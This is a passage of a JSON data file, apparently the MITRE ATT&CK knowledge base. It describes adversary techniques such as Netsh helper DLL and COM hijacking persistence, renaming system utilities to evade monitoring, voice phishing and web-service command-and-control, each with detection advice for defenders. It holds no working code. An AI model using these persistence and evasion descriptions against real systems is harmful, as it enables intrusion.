well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--baf60e1a-afe5-4d31-830f-1b1ba2351884", "created": "2020-10-02T16:42:17.482Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1592/002", "external_id": "T1592.002"}, {"source_name": "ATT ScanBox", "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.", "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks"}, {"source_name": "ThreatConnect Infrastructure Dec 2020", "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", "url": "https://threatconnect.com/blog/infrastructure-research-hunting/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Netsh Helper DLL", "description": "Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\\SOFTWARE\\Microsoft\\Netsh.\n\nAdversaries can use netsh.exe with helper DLLs to proxy execution of arbitrary code in a persistent manner when netsh.exe is executed automatically with another Persistence technique or if other persistent software is present on the system that executes netsh.exe as part of its normal functionality. Examples include some VPN software that invoke netsh.exe. (Citation: Demaske Netsh Persistence)\n\nProof of concept code exists to load Cobalt Strike's payload using netsh.exe helper DLLs. (Citation: Github Netsh Helper CS Beacon)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Matthew Demaske, Adaptforward"], "x_mitre_detection": "It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\\SOFTWARE\\Microsoft\\Netsh registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "x_mitre_system_requirements": ["{{LinkByID|S0108}}"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--bb0e0cb5-f3e4-4118-a4cb-6bf13bfbc9f2", "created": "2017-05-31T21:31:40.168Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1128", "external_id": "T1128"}, {"source_name": "TechNet Netsh", "description": "Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017.", "url": "https://technet.microsoft.com/library/bb490939.aspx"}, {"source_name": "Demaske Netsh Persistence", "description": "Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017.", "url": "https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html"}, {"source_name": "Github Netsh Helper CS Beacon", "description": "Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved February 13, 2017.", "url": "https://github.com/outflankbv/NetshHelperBeacon"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Input Capture", "description": "Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}, {"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["John Lambert, Microsoft Threat Intelligence Center"], "x_mitre_detection": "Detection may vary depending on how input is captured but may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), and ensuring no unauthorized drivers or kernel modules that could indicate keylogging or API hooking are present.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "SYSTEM", "root", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", "created": "2017-05-31T21:30:48.323Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1056", "external_id": "T1056"}, {"source_name": "Adventures of a Keystroke", "description": "Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth look into keyloggers on Windows. Retrieved April 27, 2016.", "url": "http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-15T11:49:40.990Z", "name": "Spearphishing Voice", "description": "Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.\n\nAll forms of phishing are electronically delivered social engineering. In this scenario, adversaries are not directly sending malware to a victim vice relying on [User Execution](https://attack.mitre.org/techniques/T1204) for delivery and execution. For example, victims may receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools ([Remote Access Software](https://attack.mitre.org/techniques/T1219)) onto their computer.(Citation: Unit42 Luna Moth)\n\nAdversaries may also combine voice phishing with [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621) in order to trick users into divulging MFA credentials or accepting authentication prompts.(Citation: Proofpoint Vishing)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Office 365", "SaaS", "Google Workspace"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", "created": "2023-09-07T21:50:08.827Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1566/004", "external_id": "T1566.004"}, {"source_name": "CISA Remote Monitoring and Management Software", "description": "CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring and Management Software. Retrieved February 2, 2023.", "url": "https://www.cisa.gov/uscert/ncas/alerts/aa23-025a"}, {"source_name": "Unit42 Luna Moth", "description": "Kristopher Russo. (n.d.). Luna Moth Callback Phishing Campaign. Retrieved February 2, 2023.", "url": "https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/"}, {"source_name": "sygnia Luna Month", "description": "Oren Biderman, Tomer Lahiyani, Noam Lifshitz, Ori Porag. (n.d.). LUNA MOTH: THE THREAT ACTORS BEHIND RECENT FALSE SUBSCRIPTION SCAMS. Retrieved February 2, 2023.", "url": "https://blog.sygnia.co/luna-moth-false-subscription-scams"}, {"source_name": "Proofpoint Vishing", "description": "Proofpoint. (n.d.). What Is Vishing?. Retrieved September 8, 2023.", "url": "https://www.proofpoint.com/us/threat-reference/vishing"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Exploits", "description": "Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)\n\nAs with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--bbc3cba7-84ae-410d-b18b-16750731dfa2", "created": "2020-10-01T01:48:15.511Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1587/004", "external_id": "T1587.004"}, {"source_name": "NYTStuxnet", "description": "William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.", "url": "https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html"}, {"source_name": "Irongeek Sims BSides 2017", "description": "Stephen Sims. (2017, April 30). Microsoft Patch Analysis for Exploitation. Retrieved October 16, 2020.", "url": "https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Social Media", "description": "Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.\n\nAdversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim\u2019s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--bbe5b322-e2af-4a5e-9625-a4e62bf84ed3", "created": "2020-10-02T16:49:31.262Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1593/001", "external_id": "T1593.001"}, {"source_name": "Cyware Social Media", "description": "Cyware Hacker News. (2019, October 2). How Hackers Exploit Social Media To Break Into Your Company. Retrieved October 20, 2020.", "url": "https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Component Object Model Hijacking", "description": "Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model) References to various COM objects are stored in the Registry. \n\nAdversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Elastic"], "x_mitre_deprecated": false, "x_mitre_detection": "There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary paths with unknown paths or otherwise malicious content. Even though some third-party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\.(Citation: Elastic COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated. \n\nLikewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "created": "2020-03-16T14:12:47.923Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1546/015", "external_id": "T1546.015"}, {"source_name": "Elastic COM Hijacking", "description": "Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting Persistence & Evasion with the COM. Retrieved September 15, 2016.", "url": "https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com"}, {"source_name": "GDATA COM Hijacking", "description": "G DATA. (2014, October). COM Object hijacking: the discreet way of persistence. Retrieved August 13, 2016.", "url": "https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence"}, {"source_name": "Microsoft Component Object Model", "description": "Microsoft. (n.d.). The Component Object Model. Retrieved August 18, 2016.", "url": "https://msdn.microsoft.com/library/ms694363.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-04-14T23:29:10.396Z", "name": "Credentials", "description": "Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nAdversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Finally, where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Vinayak Wadhwa, Lucideus", "Lee Christensen, SpecterOps", "Toby Kohlenberg"], "x_mitre_deprecated": false, "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161", "created": "2020-10-02T14:55:43.815Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1589/001", "external_id": "T1589.001"}, {"source_name": "ATT ScanBox", "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.", "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks"}, {"source_name": "Detectify Slack Tokens", "description": "Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020.", "url": "https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/"}, {"source_name": "GitHub truffleHog", "description": "Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October 19, 2020.", "url": "https://github.com/dxa4481/truffleHog"}, {"source_name": "Register Uber", "description": "McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers. Retrieved October 19, 2020.", "url": "https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/"}, {"source_name": "GitHub Gitrob", "description": "Michael Henriksen. (2018, June 9). Gitrob: Putting the Open Source in OSINT. Retrieved October 19, 2020.", "url": "https://github.com/michenriksen/gitrob"}, {"source_name": "CNET Leaks", "description": "Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.", "url": "https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/"}, {"source_name": "Okta Scatter Swine 2022", "description": "Okta. (2022, August 25). Detecting Scatter Swine: Insights into a Relentless Phishing Campaign. Retrieved February 24, 2023.", "url": "https://sec.okta.com/scatterswine"}, {"source_name": "Forbes GitHub Creds", "description": "Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved October 19, 2020.", "url": "https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196"}, {"source_name": "Register Deloitte", "description": "Thomson, I. (2017, September 26). Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'. Retrieved October 19, 2020.", "url": "https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-05-24T14:00:00.188Z", "name": "Compromise Software Supply Chain", "description": "Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.\n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", "created": "2020-03-11T14:17:21.153Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1195/002", "external_id": "T1195.002"}, {"source_name": "Avast CCleaner3 2018", "description": "Avast Threat Intelligence Team. (2018, March 8). New investigations into the CCleaner incident point to a possible third stage that had keylogger capacities. Retrieved March 15, 2018.", "url": "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities"}, {"source_name": "Command Five SK 2011", "description": "Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved April 6, 2018.", "url": "https://www.commandfive.com/papers/C5_APT_SKHack.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-09-14T21:12:48.411Z", "name": "Rename System Utilities", "description": "Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "created": "2020-02-10T20:03:11.691Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1036/003", "external_id": "T1036.003"}, {"source_name": "Twitter ItsReallyNick Masquerading Update", "description": "Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019.", "url": "https://twitter.com/ItsReallyNick/status/1055321652777619457"}, {"source_name": "Elastic Masquerade Ball", "description": "Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.", "url": "https://www.elastic.co/blog/how-hunt-masquerade-ball"}, {"source_name": "F-Secure CozyDuke", "description": "F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.", "url": "https://www.f-secure.com/documents/996508/1030745/CozyDuke"}, {"source_name": "LOLBAS Main Site", "description": "LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020.", "url": "https://lolbas-project.github.io/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Bidirectional Communication", "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. \n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", "created": "2020-03-14T22:34:03.024Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1102/002", "external_id": "T1102.002"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], 